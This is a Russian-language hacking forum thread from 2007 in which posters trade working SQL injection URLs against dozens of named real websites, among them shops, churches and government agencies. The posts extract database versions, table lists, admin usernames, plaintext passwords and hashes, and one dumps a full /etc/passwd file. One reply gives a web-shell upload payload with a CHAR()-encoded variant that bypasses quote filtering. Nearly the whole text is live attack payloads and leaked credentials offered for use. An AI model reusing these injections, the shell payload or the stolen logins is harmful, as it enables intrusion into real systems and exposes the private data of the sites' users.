http://www.nasa-academy.org/db/alumni.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws( 0x05,version(),database(),user()),30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51, 52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68 ,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,8 5,86/*
http://www.nasa-academy.org/db/alumni.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws( 0x05,TABLE_SCHEMA,TABLE_NAME),30,31,32,33,34,35,36 ,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,5 3,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69, 70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86 +from+information_schema.tables+limit+0,1/*
http://www.nasa-academy.org/db/alumni.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws( 0x05,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),30,31,32 ,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4 9,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65, 66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82 ,83,84,85,86+from+information_schema.columns+limit +0,1/*

4.0.25-standardiwdpiwdp@localhost
http://www.iwdp.co.uk/profile.php?id=-34+union+select+1,concat_ws(0x05,version(),databas e(),user()),3,4,5,6,7,8,9,10,11/*
http://www.iwdp.co.uk/profile.php?id=-34+union+select+1,concat_ws(0x05,username,password ),3,4,5,6,7,8,9,10,11+from+users+limit+0,1/*

4.0.27inodeci000073_0001ci000073_0001@ubh01-out2.ubh.inode.at
http://www.cisci.net/competition.php?lang=-1+union+select+1,2,3,concat_ws(0x05,version(),data base(),user()),5,6,7/*
http://www.cisci.net/user_info.php?lang=-1%20union%20select%201,2,3,concat_ws(0x05,user_nam e,password,email),5,6,7%20from%20user/*

4.0.27-standard-logdb206415585dbo206415585@74.208.16.93
http://restaurantway.com/index.php?smode=rest&type=1&parent=index&rest_id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x05,vers ion(),database(),user()),10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46/*
http://restaurantway.com/index.php?smode=rest&type=1&parent=index&rest_id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x05,id,u sername,password,email),10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46+from+t_user/*

fRg

15.11.2007, 09:14

rokos.ru - инет-магазинhttp://www.rokos.ru/product/suite_furniture/suite_98.html?template=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6/* 4.0.27-standard:rokosru_netcat:rokosru_netcat@localhost

nca.ru - концертное агенствоhttp://www.nca.ru/rus_concert.php?itemid=-1+union+select+1,concat(aes_decrypt(aes_encrypt(ve rsion(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(d atabase(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt (user(),0x71),0x71)),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22/* 4.1.11-Debian_4sarge5-log:t9700970_nca1:t9700970_nca1@85.249.135.11
Увы, но доступ к mysql прикрыт

je0n

15.11.2007, 13:45

http://theplace.ru/news/news.php?id=-18864%20union%20select%201,2,3,4,5,version(),7,con cat(nick,char(58),email,char(58),passwd),9,10,11,1 2+from+busers+where+1+limit+73,1/*

а можно как-нить файл залить, если кавычка фильтруется?

fRg

15.11.2007, 16:01

eurogarden.rohttp://www.eurogarden.ro/categorie.php?itemid=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), database(),user()),7/* 5.0.24a-standard-log:eurogarden:eurogarden@goober.dreamhost.com

18 таблиц:http://www.eurogarden.ro/categorie.php?itemid=-1+union+select+1,2,3,4,5,table_name,7+from+informa tion_schema.tables+limit+17,1/* интересных - нет.

books.bghttp://www.books.bg/ItemBought.php?shop=-1+union+select+1,concat_ws(0x3a,version(),database (),user())/* 5.0.38-Ubuntu_0ubuntu1.1:books2:books2@localhost

139 таблиц:http://www.books.bg/ItemBought.php?shop=-1+union+select+1,table_name+from+information_schem a.tables+limit+138,1/*
Интересные таблицы:phpbb_users
users
users_login
root:http://www.books.bg/ItemBought.php?shop=-1+union+select+1,concat_ws(0x3a,col_user_name,col_ password)+from+users_login+limit+0,1/*
"логин:пасс" : idenev:UIB7jqkj

Iceangel_

15.11.2007, 17:36

а можно как-нить файл залить, если кавычка фильтруется?
вот по сути запрос заливки шелла в вашем случае...
http://theplace.ru/news/news.php?id=-18864+union+select+1,2,3,4,5,6,7,'<?php system($_GET[cmd]); ?>',9,10,11,12+from+into+outfile+'/здесь путь.../cmd.php'/*

так будет выглядить запрос для обхода фильтрации
http://theplace.ru/news/news.php?id=-18864+union+select+1,2,3,4,5,6,7,CHAR(39, 60, 63, 112, 104, 112, 32, 115, 121, 115, 116, 101, 109, 40, 36, 95, 71, 69, 84, 91, 99, 109, 100, 93, 41, 59, 32, 63, 62, 39),9,10,11,12+from+into+outfile+CHAR(39, 47, 1079, 1076, 1077, 1089, 1100, 32, 1087, 1091, 1090, 1100, 46, 46, 46, 47, 99, 109, 100, 46, 112, 104, 112, 39)/*

P.S существует удобный плагин для таких дел HackBar (Firefox)...

Holokost

15.11.2007, 18:11

-=lebed=-

15.11.2007, 18:31

_www.dancor.sumy.ua

_http://www.dancor.sumy.ua/ads.php?archive=0&rubric_id=-123/**/union/**/select/**/1,concat(version(),0x3a,user(),0x3a,database()),3, 4,5,6/*

_www.shopcdn.ca (ShopCANADIAN)
Смотрим версию мускула, пользователя, базу:

_http://www.shopcdn.ca/searchresult.php?sbcat_id=-1+union+select+1,concat(version(),0x3a,user(),0x3a ,database()),3,4/*

5.0.22-community-max-nt:shopcdn@209.132.230.90:shopcdn
Повезло: версия=>5
Смотрим таблицы, меняя лимит:

http://www.shopcdn.ca/searchresult.php?sbcat_id=-1+union+select+1,table_name,3,4+from+information_s chema.tables+limit+1,1/*

40 таблиц

-=lebed=-

15.11.2007, 18:44

http://www.it-rex.ru/ftpgetfile.php?id=69'
Как раскрутить - не знаю...
http://www.it-rex.ru/ftpgetfile.php?id=69' union select null,pass from user where name ='admin
так ошибка не вылетает, но и данных нет

_http://www.it-rex.ru/ftpgetfile.php?id=69'+union+select+1,2/*

При таком запросе предлагается файл boot98se.exe на скачку ;)

K1nD[e]R

15.11.2007, 19:58

http://www.admedicine.org/news.php?id=-278+union+select+1,2,concat_ws(0x2F,user(),version (),database()),4,5/*

u_admedicine@localhost/4.1.22/admedicine

0nep@t0p

15.11.2007, 20:26

http://www.sibdosug.com/
http://www.sibdosug.com/type.php?type=-4+union+select+concat(username,char(58),password)+ from+phorum_users+where+admin=1/*
Версия: 4.1.22
Юзверь: sibdosug_db2@88.214.192.33
http://www.sibirdosug.com/phorum/admin.php -
admin:9da3bd1c75d51cc5da6a4fa573e269cd:slec700
Сенькс фор брутед хэш ту Iceangel_ =)

http://www.shark.ru/
http://www.shark.ru/catalog.php?rid=-37+union+select+1,load_file('/etc/passwd'),3,4,5,6,7/*
Version: 4.0.22-standard
User: root@localhost
Также можно прочитать: /etc/hosts, /etc/services, /etc/group, /etc/profile, /etc/bashrc, /etc/skel/.bashrc, /etc/php.ini, /etc/httpd/conf/httpd.conf

http://www.b-connect.ru/
http://www.b-connect.ru/view.php?id=-1155'+union+select+1,2,concat(version(),0x3a,user( )),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
Version: 4.0.26-log
User: Uwww3901S@localhost

http://www.rapida.ru/
http://www.rapida.ru/news.php?id=-22'+union+select+1,2,aes_decrypt(aes_encrypt(conca t(version(),0x3a,user()),0x71),0x71),4+from+news/*
Version: 4.1.14
User: rap_app@server2.int.rapida.ru

http://www.strasty.ru/
http://www.strasty.ru/disk.php?id=-996+union+select+1,2,3,concat(version(),char(58),u ser()),5/*
Version: 4.1.20-log
User: a2856_strasty@localhost

5taY3r

15.11.2007, 21:00

http://www.huntingdon-free-church.org.uk/index.php?pageid=-112+union+select+1,2,concat(version(),0x3a,user(), 0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
4.1.10a-standard-log
admin@localhost
eGeniusSystem

Названия таблиц подобрать не смог...(

FoxMALDER

15.11.2007, 21:28

http://www.huntingdon-free-church.org.uk/index.php?pageid=-112+union+select+1,2,concat(version(),0x3a,user(), 0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
Названия таблиц подобрать не смог...(
Это то что нашел... ;)
http://www.huntingdon-free-church.org.uk/index.php?pageid=-112+union+select+1,2,concat_ws(0x05,id,pagename,pa getitle),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32+from+pages/*

Nea7

15.11.2007, 21:42

http://www.kimkimdir.gen.tr/kimkimdir.php?id=-1+union+select+1,version(),user(),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*5.0.26-log admin-215@web-lnx-4.ttidc.com.trhttp://skoool.meb.gov.tr/keystage3.aspx?id=1+or+1=@@version'Microsoft SQL Server 2000http://skoool.meb.gov.tr/keystage3.aspx?id=1+or+1=(select+top+1+table_name+ from+INFORMATION_SCHEMA.TABLES+where+table_name+no t+in+('content_history','ad_mapping_tbl','app_mess ages','approval_status_tbl','approval_tbl','calend ar_event_tbl','calendar_tbl','cms_content_types',' config_tbl','content','content__','content_edit',' content_folder_tbl','content_index','content_index _new','content_meta_tbl','content3','dtproperties' ,'edit_meta_tbl','folder_to_template_tbl','fonts', 'form_tbl','history_meta_tbl','history_xml_tbl','l anguage_type','library','library_folder_tbl','libt ype','load_balance_tbl','max_entries','metadata_ty pe','module_licenses','nav_tbl','nav_to_content_tb l','permissions_tbl','save_meta_tbl','save_tbl','s ettings','sysconstraints','syssegments','tbl_bettD ata','templates_tbl','user_to_group_tbl','usergrou ps','users','xml_collection_tbl','xml_to_item_tbl' ))http://www.dusunenadam.com.tr/koseyazilari.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(version (),0x71),0x71),4,5,6/*4.1.1-alpha-maxhttp://www.harlemstage.org/SEASON/index.php?id=-1+union+select+1,2,3,4,version(),6/*4.1.20-loghttp://www.stagenoise.com/stagecast/episode.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9/*4.0.27-max-log

K1nD[e]R

15.11.2007, 22:06

http://www.roguegovernment.com/news.php?id=-2169+union+select+1,concat_ws(0x2F,user,password), 3,4,5,6+from+mysql.user/*

root : 6aee13f5467031e6

MegaBits

15.11.2007, 22:38

Таблицу подобрать несмог.
http://www.mts-press.ru/links.php?part_id=-9+union+select+database()/*
mts_pressru
4.0.26
mts_pressru@MTS-PRESS.ru

fobofob

15.11.2007, 23:02

http://www.ai-petri.com/index.php?m=34&a=register&country=-6+union+select+1,concat_ws(0x3a,Email,login,passwo rd)+from+users/*
_________________________________

http://www.t-avia.ru/index.php?_a=actions&type=article&id=-355+union+select+1,concat_ws(0x3a,user_LOGIN,user_ PASSWORD,user_EMAIL),3,4,5+from+users/*

_________________________________

http://www.saabfir.ru/index.php?m=34&a=register&country=-6+union+select+1,concat_ws(0x3a,Email,login,passwo rd)+from+users/*

_________________________________

http://www.armdecor.ru/index.php?m=29&a=register&country=-6+union+select+1,concat_ws(0x3a,Email,login,passwo rd)+from+users/*

_________________________________

http://creazionifranca.ru/index.php?m=34&a=register&country=-6+union+select+1,concat_ws(0x3a,login,password,Ema il)+from+users/*

_________________________________

http://www.papinbag.ru/index.php?m=34&a=register&country=-6+union+select+1,concat_ws(0x3a,Email,login,passwo rd)+from+users/*

_________________________________
а это виновник всего этого безобразия :-D

http://www.exs.cc/index.php?m=46&a=news&id=-471+union+select+concat(login,0x3a,password,0x3a,E mail,0x3a,Icq)+from+users+limit+1,1/*

KEHT33

16.11.2007, 00:04

http://www.fundsnetservices.com/searchresult.php?sbcat_id=-6+UNION+SELECT+1,concat(username,0x3a,password),3, 4,5+from+sblnk_admin/*
БД 4

MegaBits

16.11.2007, 00:37

Такое впечитление что это писал один и тот же человек...
http://www.kalendar-press.ru/links.php?part_id=-5+union+select+VERSION()/*

http://mostest.ru/links.php?part_id=-15+union+select+VERSION()/*

http://www.claycy.ru/links.php?part_id=-34+union+select+VERSION()/*

http://www.tecckom.ru/links.php?part_id=-33+union+select+VERSION()/*

http://global-star.ru/links.php?part_id=-32+union+select+VERSION()/*

http://www.antron-tek.ru/links.php?part_id=-8+union+select+aes_decrypt(aes_encrypt(version(),0 x71),0x71)/*
http://www.antron-tek.ru/links.php?part_id=-8+union+select+concat_ws(0x2F,LOAD_FILE('/etc/passwd'))+from+mysql.user/*
http://www.antron-tek.ru/links.php?part_id=-8+union+select+concat_ws(0x2F,user,password)+from+ mysql.user+limit+1,3/*

KEHT33

16.11.2007, 02:14

Известный канал на кабельнос телевидении TDK
5 версия БД
http://www.tdktv.ru/index.php?menu=program&id=-9+UNION+SELECT+1,concat(username,0x3a,user_passwor d,0x3a,user_icq,0x3a,user_email,0x3a,user_aim,0x3a ,user_yim,0x3a,user_msnm,0x3a,user_occ),3+FROM+php bb_users/*

ДБ 4
http://www.debinnenvaart.nl/schependb/inhoud.php?action=tel&id=-6899'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,USER(),19,20,21,DATABASE(),VERSION(),24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57, 58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74 ,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,9 1,92,93,94,95,96,97,98,99,100,101,102,103,104,105, 106,107,108,109,110,111,112,113,114,115,116,117,11 8,119,120,121,122,123,124,125,126,127,128,129,130, 131,132,133,134,135,136,137,138,139,140,141,142,14 3,144,145,146,147,148,149,150,151,152,153,154,155/*

4ДБ
нашёл только 2 таблицы news и products
http://fotosale.com.ua/index.php?mod=prod&cid=1&bid=1&pid=471+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17/*

KEHT33

16.11.2007, 13:06

http://www.animalsasia.org/index.php?module=3&menupos=10+UNION+SELECT+1,2,3,4,5,6,concat(user,0x 3a,password),8,9,10,11,12,13,14+FROM+mysql.user/*
БД 4

fRg

16.11.2007, 13:22

anad.gov.ro - Национальное Румынское Анти-допинговое Агенствоhttp://www.anad.gov.ro/html/ro/presa_comunicate.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6/* 5.0.32-Debian_7etch1-log:db_anad:anaddba@web1.stsisp.ro

Доступна только одна таблица :mad: :comunicate

MegaBits

16.11.2007, 15:51

http://www.kontenental.ru/index.php?page_id=-146+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),database(),user()),7,8,9,10,11,12,13,14,15,16/*
5.0.27-standard
master74_setiriba
master74_setirib@localhost
http://www.kontenental.ru/index.php?page_id=-146+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws (0x3a,table_name),13,14,15,16+from+information_sch ema.tables+limit+5,10/*

-MoLoToK-

17.11.2007, 02:27

Ultimate Frisbee

http://www.ultimate.com.ua/ru/?g=manual&id=-1+union+select+1,2,3,4,5,version()/*

5.0.27-log

http://www.ultimate.com.ua/ru/?g=manual&id=-1+union+select+1,2,3,4,5,Table_name+from+informati on_schema.tables/*

есть доступ к information_schema.tables

интересные таблицы
admins
news
ULTM_players
players

А®ТеS

17.11.2007, 02:56

Бага в юнекте (кто в танке - вот идешь ты пополнять баланс, а тут юнект...). Нашел Ув. Товарищ Dj_Bes и выложил в болталке за что очень несправедливо получил кучу брани в свой адрес. Инъекцию выкладывал не разработанную, я довел ее до ума, вот результаты:
5.0.40-log;unactpay@pechkin;unactpay_db
http://unactpay.ru/index.php?page=news&cur=1&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12, 13+from+INFORMATION_SCHEMA.tables+LIMIT+1,1/*
таблицы походу такие:
file
menu
news
offices
order_rent
page
partners
provider
terminal
terminal_category
terminal_type
filepriv не позволяет проводить операции с файлами =\.

А®ТеS

17.11.2007, 03:06

З.Ы. Блин забыл - интересна табличка order_rent , я не вкурил кем она заполняеться но судя по названия (order - приказывать, но можно здесь перевести и как заказ) это табличка заказов. Это походу единственное что заслуживает внимания - http://unactpay.ru/index.php?page=news&cur=1&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,name,12,13+FRO M+order_rent/* например так.

Кодеры - явно барыги и добавили какую то кривую защиту. Т.е. для подбора имен полей пользоваться банальным WHERE+TABLE_NAME='vasya_pupkin' нельзя, нужно воспользоваться функцией char(), т.е. например WHERE+TABLE_NAME='vasya_pupkin' прерращаеться в WHERE+TABLE_NAME=char(118,97,115,121,97,95,112,117 ,112,107,105,110)

KEHT33

17.11.2007, 12:22

http://www.posibila.ro/index.php?ce=artisti&id=116+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
БД 4

MegaBits

17.11.2007, 16:01

http://frozenfoods.ru/links.php?part_id=-27+union+select+login+from+users/*
Пользователи.
admin:yjvekg12
frozenfoods:irishka
buyer:enter
шелл залить не получаеться
/www/vhosts/frozenfoods.ru/html/func/admin.inc

sharoff

18.11.2007, 12:59

Все скули ищутся вручную, или в частных случаях, самописными приватными программами, которые никто никогда не даст.

PS:
http://www.sosna.ru/?nid=-41+union+select+1,2,3,user(),version(),6/*
БД5. Если кто шелл зальет стукните в аську

Ded MustD!e

18.11.2007, 22:37

http://www.fwdshop.ru/ - молодежная одежда, оптовая торговля

http://www.fwdshop.ru/index.php?gallery=-1+union+SELECT+1,concat_ws(char(58,58),user_id,use r_email,password,password2)+FROM+fwd_users/*

Через limit перебираем пользователей. Позабавило то, что в поле password2 лежит зашифрованый пароль, а в password - в открытом виде, всегда бы так :D

Tyc00n

18.11.2007, 23:02

Разбираем :)
http://www.football-equipment-uk.com/links.php?link_id=-99%20union%20select%201,2,3,4,5,6,7,8,9/*
http://www.vernunft-schweiz.ch/links.php?link_id=-999+union+select+1,2,3,4,5,6/*
http://danilka.com/links.php?link_id=-999+union+select+1,2,3,4,5,6,7,8,9/*
http://www.litriocht.com/shop/links.php?link_id=-999+union+select+1,2,version(),user(),5,6,7,8,9/*
http://www.dsp-es.com/vshop/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
http://www.lickscycles.com/catalog/links.php?link_id=-999+union+select+version(),2,database(),user(),5,6 ,7,8,9,10/*
http://www.eoilcandles.com/catalog/links.php?link_id=-999+union+select+version(),2,database(),user(),5,6 ,7,8,9,10/*

Ded MustD!e

19.11.2007, 01:05

http://www.thecorporatelibrary.com/

http://www.thecorporatelibrary.com/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(char(58), user_id,username,pword),10,11,12,13,14,15,16,17,18 +from+users/*

Перебираем лимитом...

http://www.btleague.net/

Что-то напоминающее примитивную онлайн игру, но я так и не разобрался, не силен я в итальянском....

http://www.btleague.net/info.asp?id=1+or+1=(SELECT+TOP+1+usuario+FROM+USUA RIO)--
http://www.btleague.net/info.asp?id=1+or+1=(SELECT+TOP+1+passw+FROM+USUARI O)--

Все колонки таблицы USUARIO: 'id_usuario','passw','fecha_registro','ultimo_logi n','email','usuario','imagen','bot','region','pais ','zona','ip_registro','activo','GM'

Таблицы:

'HISTORIAL_ECONOMICO','TIPO_CRIATURA','TIPO_GUARID A','GUARIDA','POBLADO','CAMPAMENTO','TIPO_INFRAEST RUCTURA','kill_kk','INFRAESTRUCTURAS','OBRAS','HAB ITANTES','ESTADISTICA_USUARIO','EJERCITOS','LEADER ','EJERCITO','CORREO','RETO','BATALLA','COMENTARIO S','SUCESOS','REQUISITOS','NOTICIAS','TROFEO','PRI SIONEROS_IP','TIPO_OFICIO','TRABAJADORES','FABRICA ','CONTROL','PAQUETES','PAQUETE','LIGAS','PARTIDOS ','CLASIFICACION','BTLEAGUE','GRUPOS','ACTA','USUA RIO','PROPIEDADES_USUARIO','VASALLOS'

t0ox

19.11.2007, 05:46

http://www.folgreb.ru/news/article.php?id=-21+union+select+1,concat_ws(0x3a,version(),%20%20d atabase(),user()),3,4,5,6,7,8,9,10,11,12,13/*

5.0.45:folgrebru_site:folgrebru@81.177.16.61

fRg

19.11.2007, 11:00

intercer.nethttp://www.intercer.net/newstext.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23/* 4.1.22-standard:intercer_su:intercer_su@localhost

fRg

19.11.2007, 12:26

adventistmuntenia.rohttp://www.adventistmuntenia.ro/newstext.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22/* 4.0.27-standard-log:muntenia_su:muntenia_su@localhost

fRg

19.11.2007, 15:16

arhitectura1906.rohttp://www.arhitectura1906.ro/newsdetail.php?id_nws=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16/* 4.1.22-standard:usr_web15_2:web15@localhost

romanialibera.comhttp://www.romanialibera.com/articole/articol.php?care=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,concat_ws(0x3a,version(),database(),u ser())/* 4.1.20:romanialibera_com:rldbadmin@localhost

Нашёл таблу useri, а в ней одно поле - email

Tyc00n

19.11.2007, 15:42

Разбираем №2 :)
http://www.freefeasibilities.biz/links.php?link_id=-999+union+select+1,user(),version(),4,5,6/*
http://www.black-gold.de/games.php?game_id=-999+union+select+1,2,3,4,5,6,7/*
http://www.internet-allround.de/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
http://www.bobis24-shop.de/catalog/links.php?link_id=-999+union+select+1,2,3,4,5,6,7,8,9,10/*
http://www.bobolandia.com/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
http://www.accountablebanking.com/links.php?link_id=-999+union+select+1,2,3,4,concat(user,0x3a,password ),6,7,8,9,10,11+from+mysql.user/*
bh:3a0293a9050b30f9

AFoST

19.11.2007, 22:17

http://www.barriodelcarmen.net/evolucion/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/**/limit/**/1,10/*
Alex:2b132404fa9459ff3e6acec9737d3266

http://www.maynooth.org/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/**/limit/**/1,10/*
Admin:5fec178cdc2f426f64764b87eaa5b9d7

v1ru$

19.11.2007, 23:04

http://www.classicalsource.com/db_control/db_concert_review.php?id=-3392+union+select+concat(user_name,0x3a,password,0 x3a,email),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23+from+user+limit+1,1/*

http://www.board.46info.ru/catlinks/info/?id=-3221+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,concat_ws(0x3a,version(),database(),u ser()),20,21,22,23,24/*

gibson

19.11.2007, 23:24

http://bitteam.ru/
http://bitteam.ru/?menu=22&id=-1'+union+select+null,user(),null,null,null,null,nu ll,null,null,null/*
user: 1gb_bitcms@81.176.226.10
database: 1gb_bitcms
mysql: 4.1.21-community-max-nt-log

-MoLoToK-

20.11.2007, 01:09

http://www.webmasters.org/scripts/software-description.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,Tab le_Name,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27+from+information_schema.tables/*
есть доступ к Information_schema.tables
одна из интересных таблиц sbwmd_admin
надеюсь не боян, проверить в данный момент не могу

20.11.2007, 01:42

www.teleset-ufa.ru
_http://www.teleset-ufa.ru/news.php?id=-3+union+select+1,file_priv,user,password+from+mysq l.user
root:5aff30257b10b358
file_priv - Y
_http://www.teleset-ufa.ru/news.php?id=-3+union+select+1,2,3,LOAD_FILE('/etc/passwd')

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ident:x:98:98::/home/ident:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash quagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologin radvd:x:75:75:radvd user:/:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin radiusd:x:95:95:radiusd user:/:/bin/false ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false snort:x:100:104:Snort user:/etc/snort.d/log:/bin/bash torrent:x:101:105:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin tomcat:x:91:91:Tomcat:/usr/share/tomcat5:/bin/sh and:x:500:500:Andrey:/home/and:/bin/bash office:x:501:100:рПЮФПЧЩК СЭЙЛ ПЖЙУБ:/home/office:/bin/sh serega:x:502:100:лМЙНЙО уЕТЗЕК:/home/serega:/bin/sh mysql:x:102:106:MySQL server:/var/lib/mysql:/bin/bash cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash exim:x:93:93::/var/spool/exim:/sbin/nologin boss:x:504:502:рПОПНБТЈЧБ пЛУБОБ чСЮЕУМБЧПЧОБ:/home/boss:/bin/sh jabber:x:103:107:Jabber Server:/var/lib/jabberd:/bin/bash alia:x:505:503:нБЧМЕФЛХМПЧ жБТЙФ фХИЧБФХММПЧЙЮ:/home/alia:/bin/sh karavanov:x:506:504:лБТБЧБОПЧ уЕТЗЕК бМЕЛУЕЕЧЙЮ:/home/karavanov:/bin/sh andrey:x:507:507::/home/andrey:/bin/bash test:x:508:508::/home/test:/bin/bash andrey3510:x:509:100:чБТЙЛПЧ бОДТЕК бМЕЛУБОДТПЧЙЮ:/home/andrey3510:/bin/sh albina:x:510:100:вБИФЙЗБТЕЕЧ бЪБФ нХИБНЕФПЧЙЮ:/home/albina:/bin/sh gimall:x:511:100:зЙНБМЕФДЙОПЧ бКТБФ бЛТБНПЧЙЮ:/home/gimall:/bin/sh magner:x:512:100:ппп рБТЙФЕФ:/home/magner:/bin/sh nelli:x:513:100:ъЙСОЗЙТПЧБ оЕММЙ нБТБФПЧОБ:/home/nelli:/bin/sh kniga:x:515:100:мЩУЕОЛПЧБ н.а.:/home/kniga:/bin/sh qtss:x:516:516::/home/qtss:/bin/bash cristina:x:517:100:оБЪБТПЧ йЗПТШ бОБФПМШЕЧЙЮ:/home/cristina:/bin/sh mops:x:518:100::/home/mops:/bin/sh tanya:x:519:100:жЕДПУЕЕЧБ ф.а.:/home/tanya:/bin/sh lena:x:520:100::/home/lena:/bin/sh halim73:x:521:100::/home/halim73:/bin/sh marsel:x:522:100::/home/marsel:/bin/sh step:x:523:100::/home/step:/bin/sh shahyagan:x:524:100:нХИБНБДЕЕЧ с.и.:/home/shahyagan:/bin/sh azat:x:525:100:йУБОВБЕЧ бЪБФ:/home/azat:/bin/sh ruspak:x:526:100::/home/ruspak:/bin/sh vatslav:x:527:100:вБТЭЕЧУЛЙК ч.о.:/home/vatslav:/bin/sh veronica:x:528:100:бВТБНПЧБ 